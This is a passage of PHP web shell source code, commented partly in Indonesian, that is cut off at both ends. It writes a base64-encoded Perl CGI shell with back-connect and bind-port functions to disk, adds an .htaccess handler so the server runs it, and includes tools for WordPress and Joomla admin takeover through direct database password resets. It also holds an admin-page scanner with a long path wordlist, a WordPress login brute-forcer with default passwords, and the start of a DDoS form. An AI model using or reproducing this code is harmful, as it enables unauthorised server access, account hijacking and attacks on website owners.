Igd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=\';\r\n\r\n$file = fopen("cgi2012.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgi2012));\r\nfclose($file);\r\n    chmod("cgi2012.izo",0755);\r\n   echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n \r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'config\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";\r\n\r\n  mkdir(\'config\', 0755);\r\n    chdir(\'config\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\t\t\r\nAddType application/x-httpd-cgi .cpc\r\n\r\nAddHandler cgi-script .izo\r\nAddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n\r\n$file = fopen("config.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($configshell));\r\nfclose($file);\r\n    chmod("config.izo",0755);\r\n   echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>\r\n   </div>"; \r\n}\r\n/////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n///////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wp-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Wordpress Reset Password  ]==--+</font></b><br><br>";\r\n  \r\n  if(empty($_POST[\'pwd\'])){\r\n  \r\necho "<FORM method=\'POST\'>\r\n<table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;Pass Baru</td><td>\r\n<input style=\'width:80px;\' class=\'inputz\' type=\'text\' name=\'pwd\' value=\'123456\' />&nbsp;\r\n\r\n<input style=\'width:19%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n\r\n\r\n @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n @mysql_select_db($database) or die(mysql_error());\r\n\r\n$hash = crypt($pwd);\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_email =\'".$SQL."\' WHERE ID = 1") or die(mysql_error());\r\n\r\n\r\nif($a4s){\r\necho "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";\r\n}\r\n\r\n}\r\n  \r\n  \r\n  echo "\r\n   </div>"; }\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jm-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";\r\n\tif(empty($_POST[\'pwd\'])){\r\necho "<FORM method=\'POST\'><table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'database\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'db_user\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'password\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 = \r\n<input style=\'width:130px;\' class=\'inputz\' name=\'pwd\' value=\'e10adc3949ba59abbe56e057f20f883e\' />&nbsp;\r\n\r\n<input style=\'width:23%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n@mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n@mysql_select_db($database) or die(mysql_error());\r\n$hash = crypt($pwd);\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 65") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 65") or die(mysql_error());\r\nif($SQL){\r\necho "<b>Success : skarang password barunya >>> - (123456)";\r\n}\r\n}\r\n\t\r\n  echo "\r\n   </div>"; \r\n} \r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'adfin\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">\r\n\r\n<?php\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n$list[\'front\'] ="admin\r\nadm\r\nadmincp\r\nadmcp\r\ncp\r\nmodcp\r\nmoderatorcp\r\nadminare\r\nadmins\r\ncpanel\r\ncontrolpanel";\r\n$list[\'end\'] = "admin1.php\r\nadmin1.html\r\nadmin2.php\r\nadmin2.html\r\nyonetim.php\r\nyonetim.html\r\nyonetici.php\r\nyonetici.html\r\nccms/\r\nccms/login.php\r\nccms/index.php\r\nmaintenance/\r\nwebmaster/\r\nadm/\r\nconfiguration/\r\nconfigure/\r\nwebsvn/\r\nadmin/\r\nadmin/account.php\r\nadmin/account.html\r\nadmin/index.php\r\nadmin/index.html\r\nadmin/login.php\r\nadmin/login.html\r\nadmin/home.php\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin.php\r\nadmin.html\r\nadmin/cp.php\r\nadmin/cp.html\r\ncp.php\r\ncp.html\r\nadministrator/\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator.php\r\nadministrator.html\r\nlogin.php\r\nlogin.html\r\nmodelsearch/login.php\r\nmoderator.php\r\nmoderator.html\r\nmoderator/login.php\r\nmoderator/login.html\r\nmoderator/admin.php\r\nmoderator/admin.html\r\nmoderator/\r\naccount.php\r\naccount.html\r\ncontrolpanel/\r\ncontrolpanel.php\r\ncontrolpanel.html\r\nadmincontrol.php\r\nadmincontrol.html\r\nadminpanel.php\r\nadminpanel.html\r\nadmin1.asp\r\nadmin2.asp\r\nyonetim.asp\r\nyonetici.asp\r\nadmin/account.asp\r\nadmin/index.asp\r\nadmin/login.asp\r\nadmin/home.asp\r\nadmin/controlpanel.asp\r\nadmin.asp\r\nadmin/cp.asp\r\ncp.asp\r\nadministrator/index.asp\r\nadministrator/login.asp\r\nadministrator/account.asp\r\nadministrator.asp\r\nlogin.asp\r\nmodelsearch/login.asp\r\nmoderator.asp\r\nmoderator/login.asp\r\nmoderator/admin.asp\r\naccount.asp\r\ncontrolpanel.asp\r\nadmincontrol.asp\r\nadminpanel.asp\r\nfileadmin/\r\nfileadmin.php\r\nfileadmin.asp\r\nfileadmin.html\r\nadministration/\r\nadministration.php\r\nadministration.html\r\nsysadmin.php\r\nsysadmin.html\r\nphpmyadmin/\r\nmyadmin/\r\nsysadmin.asp\r\nsysadmin/\r\nur-admin.asp\r\nur-admin.php\r\nur-admin.html\r\nur-admin/\r\nServer.php\r\nServer.html\r\nServer.asp\r\nServer/\r\nwp-admin/\r\nadministr8.php\r\nadministr8.html\r\nadministr8/\r\nadministr8.asp\r\nwebadmin/\r\nwebadmin.php\r\nwebadmin.asp\r\nwebadmin.html\r\nadministratie/\r\nadmins/\r\nadmins.php\r\nadmins.asp\r\nadmins.html\r\nadministrivia/\r\nDatabase_Administration/\r\nWebAdmin/\r\nuseradmin/\r\nsysadmins/\r\nadmin1/\r\nsystem-administration/\r\nadministrators/\r\npgadmin/\r\ndirectadmin/\r\nstaradmin/\r\nServerAdministrator/\r\nSysAdmin/\r\nadminister/\r\nLiveUser_Admin/\r\nsys-admin/\r\ntypo3/\r\npanel/\r\ncpanel/\r\ncPanel/\r\ncpanel_file/\r\nplatz_login/\r\nrcLogin/\r\nblogindex/\r\nformslogin/\r\nautologin/\r\nsupport_login/\r\nmeta_login/\r\nmanuallogin/\r\nsimpleLogin/\r\nloginflat/\r\nutility_login/\r\nshowlogin/\r\nmemlogin/\r\nmembers/\r\nlogin-redirect/\r\nsub-login/\r\nwp-login/\r\nlogin1/\r\ndir-login/\r\nlogin_db/\r\nxlogin/\r\nsmblogin/\r\ncustomer_login/\r\nUserLogin/\r\nlogin-us/\r\nacct_login/\r\nadmin_area/\r\nbigadmin/\r\nproject-admins/\r\nphppgadmin/\r\npureadmin/\r\nsql-admin/\r\nradmind/\r\nopenvpnadmin/\r\nwizmysqladmin/\r\nvadmind/\r\nezsqliteadmin/\r\nhpwebjetadmin/\r\nnewsadmin/\r\nadminpro/\r\nLotus_Domino_Admin/\r\nbbadmin/\r\nvmailadmin/\r\nIndy_admin/\r\nccp14admin/\r\nirc-macadmin/\r\nbanneradmin/\r\nsshadmin/\r\nphpldapadmin/\r\nmacadmin/\r\nadministratoraccounts/\r\nadmin4_account/\r\nadmin4_colon/\r\nradmind-1/\r\nSuper-Admin/\r\nAdminTools/\r\ncmsadmin/\r\nSysAdmin2/\r\nglobes_admin/\r\ncadmins/\r\nphpSQLiteAdmin/\r\nnavSiteAdmin/\r\nserver_admin_small/\r\nlogo_sysadmin/\r\nserver/\r\ndatabase_administration/\r\npower_user/\r\nsystem_administration/\r\nss_vms_admin_sm/\r\nadminarea/\r\nbb-admin/\r\nadminLogin/\r\npanel-administracion/\r\ninstadmin/\r\nmemberadmin/\r\nadministratorlogin/\r\nadmin/admin.php\r\nadmin_area/admin.php\r\nadmin_area/login.php\r\nsiteadmin/login.php\r\nsiteadmin/index.php\r\nsiteadmin/login.html\r\nadmin/admin.html\r\nadmin_area/index.php\r\nbb-admin/index.php\r\nbb-admin/login.php\r\nbb-admin/admin.php\r\nadmin_area/login.html\r\nadmin_area/index.html\r\nadmincp/index.asp\r\nadmincp/login.asp\r\nadmincp/index.html\r\nwebadmin/index.html\r\nwebadmin/admin.html\r\nwebadmin/login.html\r\nadmin/admin_login.html\r\nadmin_login.html\r\npanel-administracion/login.html\r\nnsw/admin/login.php\r\nwebadmin/login.php\r\nadmin/admin_login.php\r\nadmin_login.php\r\nadmin_area/admin.html\r\npages/admin/admin-login.php\r\nadmin/admin-login.php\r\nadmin-login.php\r\nbb-admin/index.html\r\nbb-admin/login.html\r\nbb-admin/admin.html\r\nadmin/home.html\r\npages/admin/admin-login.html\r\nadmin/admin-login.html\r\nadmin-login.html\r\nadmin/adminLogin.html\r\nadminLogin.html\r\nhome.html\r\nrcjakar/admin/login.php\r\nadminarea/index.html\r\nadminarea/admin.html\r\nwebadmin/index.php\r\nwebadmin/admin.php\r\nuser.html\r\nmodelsearch/login.html\r\nadminarea/login.html\r\npanel-administracion/index.html\r\npanel-administracion/admin.html\r\nmodelsearch/index.html\r\nmodelsearch/admin.html\r\nadmincontrol/login.html\r\nadm/index.html\r\nadm.html\r\nuser.php\r\npanel-administracion/login.php\r\nwp-login.php\r\nadminLogin.php\r\nadmin/adminLogin.php\r\nhome.php\r\nadminarea/index.php\r\nadminarea/admin.php\r\nadminarea/login.php\r\npanel-administracion/index.php\r\npanel-administracion/admin.php\r\nmodelsearch/index.php\r\nmodelsearch/admin.php\r\nadmincontrol/login.php\r\nadm/admloginuser.php\r\nadmloginuser.php\r\nadmin2/login.php\r\nadmin2/index.php\r\nadm/index.php\r\nadm.php\r\naffiliate.php\r\nadm_auth.php\r\nmemberadmin.php\r\nadministratorlogin.php\r\nadmin/admin.asp\r\nadmin_area/admin.asp\r\nadmin_area/login.asp\r\nadmin_area/index.asp\r\nbb-admin/index.asp\r\nbb-admin/login.asp\r\nbb-admin/admin.asp\r\npages/admin/admin-login.asp\r\nadmin/admin-login.asp\r\nadmin-login.asp\r\nuser.asp\r\nwebadmin/index.asp\r\nwebadmin/admin.asp\r\nwebadmin/login.asp\r\nadmin/admin_login.asp\r\nadmin_login.asp\r\npanel-administracion/login.asp\r\nadminLogin.asp\r\nadmin/adminLogin.asp\r\nhome.asp\r\nadminarea/index.asp\r\nadminarea/admin.asp\r\nadminarea/login.asp\r\npanel-administracion/index.asp\r\npanel-administracion/admin.asp\r\nmodelsearch/index.asp\r\nmodelsearch/admin.asp\r\nadmincontrol/login.asp\r\nadm/admloginuser.asp\r\nadmloginuser.asp\r\nadmin2/login.asp\r\nadmin2/index.asp\r\nadm/index.asp\r\nadm.asp\r\naffiliate.asp\r\nadm_auth.asp\r\nmemberadmin.asp\r\nadministratorlogin.asp\r\nsiteadmin/login.asp\r\nsiteadmin/index.asp\r\nADMIN/\r\npaneldecontrol/\r\nlogin/\r\ncms/\r\nadmon/\r\nADMON/\r\nadministrador/\r\nADMIN/login.php\r\npanelc/\r\nADMIN/login.html";\r\nfunction template() {\r\necho \'\r\n\r\n<script type="text/javascript">\r\n<!--\r\nfunction insertcode($text, $place, $replace)\r\n{\r\n    var $this = $text;\r\n    var logbox = document.getElementById($place);\r\n    if($replace == 0)\r\n        document.getElementById($place).innerHTML = logbox.innerHTML+$this;\r\n    else\r\n        document.getElementById($place).innerHTML = $this;\r\n//document.getElementById("helpbox").innerHTML = $this;\r\n}\r\n-->\r\n</script>\r\n<br>\r\n<br>\r\n<h1 class="technique-two">\r\n       \r\n\r\n\r\n</h1>\r\n\r\n<div class="wrapper">\r\n<div class="red">\r\n<div class="tube">\r\n<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>\r\n<form action="" method="post" name="xploit_form">\r\n\r\n<tr>\r\n<tr>\r\n\t<b><td>URL</td>\r\n\t<td><input class="inputz" type="text" name="xploit_url" value="\'.$_POST[\'xploit_url\'].\'" style="width: 350px;" />\r\n\t</td>\r\n</tr><tr>\r\n\t<td>404 string</td>\r\n\t<td><input class="inputz" type="text" name="xploit_404string" value="\'.$_POST[\'xploit_404string\'].\'" style="width: 350px;" />\r\n\t</td></b>\r\n</tr><br><td>\r\n<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />\r\n</span></td></tr>\r\n</form></td></tr>\r\n<br /></table>\r\n</div> <!-- /tube -->\r\n</div> <!-- /red -->\r\n<br />\r\n<div class="green">\r\n<div class="tube" id="rightcol">\r\nVerificat: <span id="verified">0</span> / <span id="total">0</span><br />\r\n<b>Found ones:<br /></b>\r\n</div> <!-- /tube -->\r\n</div></center><!-- /green -->\r\n<br clear="all" /><br />\r\n<div class="blue">\r\n<div class="tube" id="logbox">\r\n<br />\r\n<br />\r\nAdmin page Finder :<br /><br />\r\n</div> <!-- /tube -->\r\n</div> <!-- /blue -->\r\n</div> <!-- /wrapper -->\r\n<br clear="all"><br>\';\r\n}\r\nfunction show($msg, $br=1, $stop=0, $place=\'logbox\', $replace=0) {\r\n    if($br == 1) $msg .= "<br />";\r\n    echo "<script type=\\"text/javascript\\">insertcode(\'".$msg."\', \'".$place."\', \'".$replace."\');</script>";\r\n    if($stop == 1) exit;\r\n    @flush();@ob_flush();\r\n}\r\nfunction check($x, $front=0) {\r\n    global $_POST,$site,$false;\r\n    if($front == 0) $t = $site.$x;\r\n    else $t = \'http://\'.$x.\'.\'.$site.\'/\';\r\n    $headers = get_headers($t);\r\n    if (!eregi(\'200\', $headers[0])) return 0;\r\n    $data = @file_get_contents($t);\r\n    if($_POST[\'xploit_404string\'] == "") if($data == $false) return 0;\r\n    if($_POST[\'xploit_404string\'] != "") if(strpos($data, $_POST[\'xploit_404string\'])) return 0;\r\n    return 1;\r\n}\r\n   \r\n// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\ntemplate();\r\nif(!isset($_POST[\'xploit_url\'])) die;\r\nif($_POST[\'xploit_url\'] == \'\') die;\r\n$site = $_POST[\'xploit_url\'];\r\nif ($site[strlen($site)-1] != "/") $site .= "/";\r\nif($_POST[\'xploit_404string\'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");\r\n$list[\'end\'] = str_replace("\\r", "", $list[\'end\']);\r\n$list[\'front\'] = str_replace("\\r", "", $list[\'front\']);\r\n$pathes = explode("\\n", $list[\'end\']);\r\n$frontpathes = explode("\\n", $list[\'front\']);\r\nshow(count($pathes)+count($frontpathes), 1, 0, \'total\', 1);\r\n$verificate = 0;\r\nforeach($pathes as $path) {\r\n    show(\'Checking \'.$site.$path.\' : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($path) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="\'.$site.$path.\'">\'.$site.$path.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n}\r\npreg_match("/\\/\\/(.*?)\\//i", $site, $xx); $site = $xx[1];\r\nif(substr($site, 0, 3) == "www") $site = substr($site, 4);\r\nforeach($frontpathes as $frontpath) {\r\n    show(\'Checking http://\'.$frontpath.\'.\'.$site.\'/ : \', 0, 0, \'logbox\', 0);\r\n    $verificate++; show($verificate, 0, 0, \'verified\', 1);\r\n    if(check($frontpath, 1) == 0) show(\'not found\', 1, 0, \'logbox\', 0);\r\n    else{\r\n        show(\'<span style="color: #00FF00;"><strong>found</strong></span>\', 1, 0, \'logbox\', 0);\r\n        show(\'<a href="http://\'.$frontpath.\'.\'.$site.\'/">\'.$frontpath.\'.\'.$site.\'</a>\', 1, 0, \'rightcol\', 0);\r\n    }\r\n   \r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wpbrute\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wpbrute" method="post">\r\n<center>\r\n<br><Br><b><font size=\'2\' >+--=[ Wordpress Brute Force ]=--+</font><br>\r\n<center><p>Tanks To <a href="https://www.facebook.com/anton115" target="_blank">Cah_bagus</a></p></b></center>\r\n<form enctype="multipart/form-data" method="POST">\r\n  <table width=\'624\' border=\'0\' class=\'tabnet\' id=\'Box\'>\r\n  <tr><th colspan="5">Wordpress Brute Force</th></tr>\r\n    \r\n\r\n    <tr>\r\n      <td >&nbsp;</td>\r\n      <td ><p>Hosts:</p></td>\r\n      <td ><p> Users:</p></td>\r\n      <td ><p>Passwords:</p></td>\r\n    </tr>\r\n    <tr>\r\n      <td>&nbsp;</td>\r\n      <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST[\'hosts\'];} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'usernames\'];}else {echo "admin";} ?></textarea></td>\r\n      <td ><textarea style="background:black;" name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST[\'passwords\'];}else {echo "admin\\nadministrator\\n123123\\n123321\\n123456\\n1234567\\n12345678\\n123456789\\n123456123456\\nadmin2010\\nadmin2011\\npassword\\nP@ssW0rd\\n!@#$%^\\n!@#$%^&*(\\n(*&^%$#@!\\n111111\\n222222\\n333333\\n444444\\n555555\\n666666\\n777777\\n888888\\n999999";} ?></textarea></td>\r\n    </tr>\r\n<tr><td colspan="4"><input class=\'inputzbut\' type="submit" name="submit" value="Brute Now"  />\r\n<?php\r\nif($_POST)\r\n{\r\n\t$hosts = trim(filter($_POST[\'hosts\']));\r\n\t$passwords = trim(filter($_POST[\'passwords\']));\r\n\t$usernames = trim(filter($_POST[\'usernames\']));\r\n\r\n\tif($passwords && $usernames && $hosts)\r\n\t{\r\n\t\t$hosts_explode = explode("\\n", $hosts);\r\n\t\t$usernames_explode = explode("\\n", $usernames);\r\n    \t$passwords_explode = explode("\\n", $passwords);\r\n\r\n\t\tforeach($hosts_explode as $host)\r\n\t\t{\r\n\t\t\t$host = RemoveLastSlash($host);\r\n\t\t\t$hacked = 0;\r\n\t\t\t$host = str_replace(array("http://","https://","www."),"",trim($host));\r\n\t\t\t$host = "http://".$host;\r\n\t\t\t$wpAdmin = $host.\'/wp-admin/\';\r\n\r\n\t\t\tif(!url_exists($host."/wp-login.php"))\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Error In Login Page !</font></p>";ob_flush();flush();continue;}\r\n\r\n\t\t\tforeach($usernames_explode as $username)\r\n\t\t\t{\r\n\t\t\t\tforeach($passwords_explode as $password)\r\n\t\t\t\t{\r\n\t\t\t\t\t$ch   =     curl_init();\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_URL,$host.\'/wp-login.php\');\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POST,TRUE);\r\n\t\t\t\t\tcurl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri&#8207;"."&redirect_to=".$wpAdmin."&testcookie=1");\r\n\t\t\t\t\t$login    =\t   curl_exec($ch);\r\n\r\n\t\t\t\t\tif(eregi ("profile.php",$login) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$hacked = 1;\r\n\t\t\t\t\t\techo "<p>".$host." => UserName : [<font color=\'green\'>".$username."</font>] : Password : [<font color=\'green\'>".$password."</font>]</p>";\r\n\t\t\t\t\t\tob_flush();flush();break;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif($hacked == 1){break;}\r\n\t\t\t}\r\n\t\t\tif($hacked == 0)\r\n\t\t\t{echo "<p>".$host." => <font color=\'red\'>Failed !</font></p>";ob_flush();flush();}\r\n\t\t}\r\n\t}\r\n\telse {echo "<p><font color=\'red\'>All fields are Required ! </font></p>";}\r\n}\r\n?>\r\n</td></tr>\r\n</table></form></center>\r\n<?php\r\nfunction url_exists($strURL)\r\n{\r\n    $resURL = curl_init();\r\n    curl_setopt($resURL, CURLOPT_URL, $strURL);\r\n    curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);\r\n    curl_setopt($resURL, CURLOPT_HEADERFUNCTION, \'curlHeaderCallback\');\r\n    curl_setopt($resURL, CURLOPT_FAILONERROR, 1);\r\n    curl_exec ($resURL);\r\n    $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);\r\n    curl_close ($resURL);\r\n    if ($intReturnCode != 200){return false;}\r\n\telse{return true ;}\r\n}\r\nfunction filter($string)\r\n{\r\n\tif(get_magic_quotes_gpc() != 0){return stripslashes($string);\t}\r\n\telse{return $string;\t}\r\n}\r\nfunction RemoveLastSlash($host)\r\n{\r\n\tif(strrpos($host, \'/\', -1) == strlen($host)-1)\r\n\t{return substr($host,0,strrpos($host, \'/\', -1));}\r\n\telse{return $host;}\r\n}\r\necho "</p>";\r\n}\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dos\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">\r\n<center><br><br><br>\r\nYour IP: <font color="red"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don\'t DoS yourself nub)<br><br>\r\n<table class="tabnet" style="width:333px;padding:0 1px;">\r\n<th colspan="5">Ddos Tool</th>\r\n<tr><tr><td>IP Target</td><td>:</td>\r\n<td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value==\'\' ) this.value = \'0.0.0.0\';" onfocus = " if ( this.value == 